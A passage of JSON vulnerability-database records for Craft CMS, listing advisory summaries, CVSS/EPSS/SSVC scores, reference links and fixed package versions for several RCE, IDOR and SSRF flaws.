ing_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47"},{"reference_url":"https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32432"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52525.py","reference_id":"CVE-2025-32432","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52525.py"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32432","reference_id":"CVE-2025-32432","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32432"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g","reference_id":"GHSA-4w8r-3xrw-v25g","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g"},{"reference_url":"https://github.com/advisories/GHSA-f3gw-9ww9-jmc3","reference_id":"GHSA-f3gw-9ww9-jmc3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f3gw-9ww9-jmc3"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3","reference_id":"GHSA-f3gw-9ww9-jmc3","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/84935?format=json","purl":"pkg:composer/craftcms/cms@5.6.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.6.17"}],"aliases":["CVE-2025-32432","GHSA-f3gw-9ww9-jmc3"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qq68-3j4y-47am"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50604?format=json","vulnerability_id":"VCID-qywv-vf4r-8bh9","summary":"Craft CMS has IDOR via GraphQL @parseRefs\nThe GraphQL directive `@parseRefs`, intended to parse internal reference tags (e.g., `{user:1:email}`), can be abused by both authenticated users and unauthenticated guests (if a Public Schema is enabled) to access sensitive attributes of any element in the CMS. The implementation in `Elements::parseRefs` fails to perform authorization checks, allowing attackers to read data they are not authorized to view.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28696","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07081","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28696"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/4d98a07e47580f1712095825d3e3c4d67bc9f8b9","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T18:00:48Z/"}],"url":"https://github.com/craftcms/cms/commit/4d98a07e47580f1712095825d3e3c4d67bc9f8b9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28696","reference_id":"CVE-2026-28696","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28696"},{"reference_url":"https://github.com/advisories/GHSA-7x43-mpfg-r9wj","reference_id":"GHSA-7x43-mpfg-r9wj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7x43-mpfg-r9wj"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7x43-mpfg-r9wj","reference_id":"GHSA-7x43-mpfg-r9wj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T18:00:48Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7x43-mpfg-r9wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28696","GHSA-7x43-mpfg-r9wj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qywv-vf4r-8bh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56504?format=json","vulnerability_id":"VCID-r5hp-5nju-9ubz","summary":"Craft CMS has a potential RCE with a compromised security key\nThis is an RCE vulnerability that affects Craft 4 and 5 installs where your security key has already been compromised.\n\nhttps://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret\n\nAnyone running an unpatched version of Craft with a compromised security key is affected.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23209","reference_id":"","reference_type":"","scores":[{"value":"0.1639","scoring_system":"epss","scoring_elements":"0.94998","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23209"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-23209","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-23209"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23209","reference_id":"CVE-2025-23209","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23209"},{"reference_url":"https://github.com/advisories/GHSA-x684-96hh-833x","reference_id":"GHSA-x684-96hh-833x","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-x684-96hh-833x"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x","reference_id":"GHSA-x684-96hh-833x","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83867?format=json","purl":"pkg:composer/craftcms/cms@5.5.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.5.8"}],"aliases":["CVE-2025-23209","GHSA-x684-96hh-833x"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5hp-5nju-9ubz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49561?format=json","vulnerability_id":"VCID-rb7c-3nkc-gkeg","summary":"Craft CMS vulnerable to Server-Side Request Forgery (SSRF) via GraphQL Asset Upload Mutation\nThe Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the `_file` input, specifically its `url` parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the `url`, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. This exploitation requires specific GraphQL permissions for asset management within the targeted volume.\n\nUsers should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue.References:\n\nhttps://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68437","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03989","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68437"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68437","reference_id":"CVE-2025-68437","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68437"},{"reference_url":"https://github.com/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x27p-wfqw-hfcc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68437","GHSA-x27p-wfqw-hfcc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rb7c-3nkc-gkeg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91012?format=json","vulnerability_id":"VCID-rzq4-h1ms-nqef","summary":"Craft CMS vulnerable to behavior injection RCE ElementIndexesController and FieldsController\nThe fix for https://github.com/advisories/GHSA-7jx7-3846-m7w7 (commit https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748) only patched `src/services/Fields.php`, but the same vulnerable pattern exists in `ElementIndexesController` and `FieldsController`.\n\nYou need Craft control panel administrator permissions, and allowAdminChanges must be enabled for this to work.\n\nAn attacker can use the same gadget chain from the original advisory to achieve RCE.\n\nUsers should update to Craft 4.17.5 and 5.9.11 to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32264","reference_id":"","reference_type":"","scores":[{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15357","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32264"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/78d181e12e0b15e1300f54ec85f19859d3300f70","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M